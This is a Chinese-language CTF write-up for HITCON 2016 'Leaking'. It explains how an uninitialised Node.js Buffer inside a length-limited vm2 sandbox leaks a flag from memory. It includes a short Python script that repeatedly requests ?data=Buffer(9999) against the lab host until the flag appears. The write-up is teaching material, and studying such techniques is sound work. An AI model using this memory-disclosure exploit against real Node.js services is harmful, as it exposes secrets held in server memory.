[HITCON 2016]Leaking
最近想学下nodejs相关的题目,所以去buu上又找了一道来做
进入题目后如上图所示,直接给出了源代码,老样子,拿出之前收藏的nodejs相关安全问题来对比着看看,我发现这里用了VM沙箱,那最有可能考的就是VM逃逸了
emem由于之前没做过,说实话,光看这个完全不知道该怎么做,还是老实找个大佬的WP来看看吧
那我们先来分析下代码,下面这段代码是整道题的核心
/* Orange is so kind so he put the flag here. But if you can guess correctly :P */
eval("var flag_" + randomstring.generate(64) + " = \"hitcon{" + flag + "}\";")
首先是这一段,看注释也能知道,这里生成了flag
if (req.query.data && req.query.data.length <= 12) {
var vm = new VM({
timeout: 1000
});
console.log(req.query.data);
res.send("eval ->" + vm.run(req.query.data));
接下来是这一段,对我们传入data参数的值进行判断长度是否小于等于12,如果符合则会放到沙箱里去执行,这里可以用数组绕过
这里就得说说这道题的考点了,这里涉及到的是nodejs的远古内存分配问题,nodejs在远古版本(Node.js v5.4.1/v4.2.4)中的Buffer分配是就着以前用过的内存分配的,并且分配完了还不会初始化一下,也就意味着之前加载进内存然后被回收掉的内存位置可能被再次分配出来,并且还不会被初始化,原始数据还保留在那。这位外国老哥在这里分析了原理
所以如果使用new Buffer(size)或其别名Buffer(size))创建,则对象不会填充零,而只要是调用过的变量,一定会存在内存中,所以需要使用Buffer()来读取内存,使用data=Buffer(9999)分配一个9999的单位为8位字节的buffer,因此很容易得到姿势
这里写个脚本
import requests
session = requests.Session()
session.trust_env = False
while True:
response = session.get('http://24225844-3e1f-469b-b6bc-343124db15d5.node4.buuoj.cn:81/?data=Buffer(9999)')
if "flag" in response.text:
print(response.text)
break
最后再提一下这题的考点
在较早一点的 node 版本中 (8.0 之前),当 Buffer 的构造函数传入数字时, 会得到与数字长度一致的一个 Buffer,并且这个 Buffer 是未清零的。8.0 之后的版本可以通过另一个函数 Buffer.allocUnsafe(size) 来获得未清空的内存。
参考文章:
https://y4tacker.blog.csdn.net/article/details/114003419?utm_medium=distribute.pc_relevant.none-task-blog-2%7Edefault%7EBlogCommendFromMachineLearnPai2%7Edefault-5.control&depth_1-utm_source=distribute.pc_relevant.none-task-blog-2%7Edefault%7EBlogCommendFromMachineLearnPai2%7Edefault-5.control
https://blog.z3ratu1.cn/%E5%88%B7%E9%A2%98%E5%88%B7%E9%A2%98.html